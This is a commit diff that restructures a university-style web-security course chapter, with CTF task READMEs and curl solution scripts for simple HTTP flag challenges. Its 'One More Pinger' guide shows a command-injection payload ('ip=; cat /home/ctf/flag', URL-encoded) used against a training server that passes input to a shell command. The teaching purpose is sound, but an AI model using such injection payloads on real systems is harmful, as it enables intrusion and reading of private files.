demystifying-web/rediscovering-the-browser: Rework session content

Transitioned the 'rediscovering-the-browser' directory
to meet the requirements of the OpenEdu Methodology.

Signed-off-by: Ismana Robert <[email protected]>

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/cockroach/README.md

@@ -0,0 +1,5 @@
+# Cockroach
+
+What methods does the server support?
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/http.md) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/cockroach/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/cockroach/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Cockroack
 echo "Start exploit for Cockroack"
 remote=$remote'/cockroach'
-flag=$(curl -s -X DELETE $remote)
+flag=$(curl -s -X DELETE "$remote")
 echo "Flag is $flag"
 echo "-------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/eyes/README.md

@@ -0,0 +1,5 @@
+# Eyes
+
+Investigate the HTML code of the website and get the flag.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/browsers.md) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/eyes/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/eyes/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Eyes
 echo "Start exploit for Eyes"
 remote=$remote'/eyes/'
-flag=$(curl -s $remote | grep -o "SSS_CTF{.*}")
+flag=$(curl -s "$remote" | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
 echo "----------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/gimme/README.md

@@ -0,0 +1,6 @@
+# Gimme
+
+Try to add a new resource to the server.
+What can that 35 mean?
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/browsers.md#curl) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/gimme/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/gimme/solution/solution.sh

@@ -15,6 +15,6 @@ fi
 echo "Start exploit for Gimme"
 remote=$remote'/gimme'
 data=$(tr -dc A-Za-z0-9 < /dev/urandom | head -c 35)
-flag=$(curl -s -X POST -H "Content-Type: text/plain" --data $data $remote)
+flag=$(curl -s -X POST -H "Content-Type: text/plain" --data "$data" "$remote")
 echo "Flag is $flag"
 echo "-------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/give-to-get/README.md

@@ -0,0 +1,6 @@
+# Give To Get
+
+Find the correct query parameter with which to get the flag.
+The message displayed by the server contains all the hints you need.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/http.md) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/give-to-get/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/give-to-get/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Give to Get
 echo "Start exploit for Give to Get"
 remote=$remote'/give-to-get/'
-flag=$(curl -s $remote'?ask=flag' | grep -o "SSS_CTF{.*}")
+flag=$(curl -s "$remote"'?ask=flag' | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
 echo "----------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/give-to-post/README.md

@@ -0,0 +1,6 @@
+# Give To Post
+
+Read the message displayed by the server carefully.
+It tells you all you need to get the flag.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/http.md) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/give-to-post/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/give-to-post/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Give to Post
 echo "Start exploit for Give to Post"
 remote=$remote'/give-to-post/'
-flag=$(curl -s --data "ask=flag" -X POST $remote | grep -o "SSS_CTF{.*}")
+flag=$(curl -s --data "ask=flag" -X POST "$remote" | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
 echo "----------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/king-kong/README.md

@@ -0,0 +1,5 @@
+# King Kong
+
+You need to tell the server that you are someone special.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/browsers.md#curl) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/king-kong/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/king-kong/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # King-Kong
 echo "Start exploit for King-Kong"
 remote=$remote'/king-kong/'
-flag=$(curl -s -A 'King-Kong' $remote | grep -o "SSS_CTF{.*}")
+flag=$(curl -s -A 'King-Kong' "$remote" | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
 echo "----------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/name/README.md

@@ -0,0 +1,5 @@
+# Name
+
+Do what the server tells you.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/http.md#requests) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/name/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/name/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Name
 echo "Start exploit for Name"
 remote=$remote'/name/'
-flag=$(curl -s $remote'the_flag.html' | grep -o "SSS_CTF{.*}")
+flag=$(curl -s "$remote"'the_flag.html' | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
 echo "----------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/tasks/surprise/README.md

@@ -0,0 +1,5 @@
+# Surprise
+
+The server expects a specific type of **content**.
+
+If you're having difficulties solving this exercise, go through [this](../../../reading/browsers.md#curl) reading material.

chapters/demystifying-web/rediscovering-the-browser/drills/surprise/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/drills/tasks/surprise/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Surprise
 echo "Start exploit for Suprise"
 remote=$remote'/surprise/'
-flag=$(curl -s --request PUT --header "Content-Type: application/json" --data '{"name":"hacker"}' $remote | tail -n 1)
+flag=$(curl -s --request PUT --header "Content-Type: application/json" --data '{"name":"hacker"}' "$remote" | tail -n 1)
 echo "Flag is $flag"
 echo "-------------------------"

chapters/demystifying-web/rediscovering-the-browser/drills/one-more-pinger/sol/README.md → chapters/demystifying-web/rediscovering-the-browser/guides/one-more-pinger/README.md

@@ -1,13 +1,12 @@
-# Name: One More Pinger
+# One More Pinger
 
-## Vulnerability
-
-The `pinger` server calls `subprocess.Popen('ping -c 1 ' + user_input)`.
-This leaves it vulnerable to a command injection attack.
-
-## Exploit
+That was simple.
+Now it's time for a more difficult use case of query parameters.
+Yes, it's "Pinger" again.
+But this time, you'll solve it **entirely from the terminal**.
 
 First, get the HTML content of the website:
+
 ```html
 root@kali:~# curl http://141.85.224.70:8069/pinger
 
@@ -29,6 +28,7 @@ root@kali:~# curl http://141.85.224.70:8069/pinger
 ```
 
 The IP is retrieved from the user via this `form`:
+
 ```html
 <form action="/ping" method="get">
     IP: <input type="text" name="ip"></br>
@@ -37,16 +37,19 @@ The IP is retrieved from the user via this `form`:
 ```
 
 From here we get the following information:
+
 - upon pressing "Submit", a `GET` request is sent to `/ping`
 - the input we provide is set as the value of the key `ip`
 
 So a request URL that gets the flag would look like this:
-```
+
+```console
 GET /ping?ip=; cat /home/ctf/flag
 ```
 
 Let's try to do this with `curl`:
-```
+
+```console
 root@kali:~# curl -v -G -d 'ip=; cat /home/ctf/flag' http://141.85.224.70:8069/ping
 *   Trying 141.85.224.70:8069...
 * TCP_NODELAY set
@@ -63,14 +66,16 @@ root@kali:~# curl -v -G -d 'ip=; cat /home/ctf/flag' http://141.85.224.70:8069/p
 
 Why does the request fail?
 Look at the request:
-```
+
+```console
 GET /ping?ip=; cat /home/ctf/flag HTTP/1.1
 ```
 
 The value of the query parameter `ip` contains some forbidden characters: `;`, `/` and space.
 We need to send them encoded for URLs.
 For this we use the `--data-urlencode` parameter for `curl`:
-```
+
+```console
 root@kali:~# curl -v -G --data-urlencode 'ip=; cat /home/ctf/flag' http://141.85.224.70:8069/ping
 *   Trying 141.85.224.70:8069...
 * TCP_NODELAY set
@@ -84,3 +89,9 @@ root@kali:~# curl -v -G --data-urlencode 'ip=; cat /home/ctf/flag' http://141.85
 < HTTP/1.1 200 OK
 [...]
 ```
+
+Notice that now the value of `ip` looks stranger: `ip=%3B%20cat%20%2Fhome%2Fctf%2Fflag`:
+
+- `%3B` is the URL encoding for `;`
+- `%20` is the URL encoding for space
+- `%2F` is the URL encoding for `/`

chapters/demystifying-web/rediscovering-the-browser/guides/readme/README.md

@@ -0,0 +1,6 @@
+# Readme
+
+The website tells you to click a hyperlink.
+Do it and then look at the address bar.
+Notice the query parameter `flag=<flag value>`.
+Flags can be hidden anywhere.

chapters/demystifying-web/rediscovering-the-browser/drills/readme/sol/solution.sh → chapters/demystifying-web/rediscovering-the-browser/guides/readme/solution/solution.sh

@@ -14,6 +14,6 @@ fi
 # Readme
 echo "Start exploit for Readme"
 remote=$remote'/readme/'
-flag=$(curl -s $remote | grep -o "SSS_CTF{.*}")
+flag=$(curl -s "$remote" | grep -o "SSS_CTF{.*}")
 echo "Flag is $flag"
-echo "----------------------------"
+echo "----------------------------"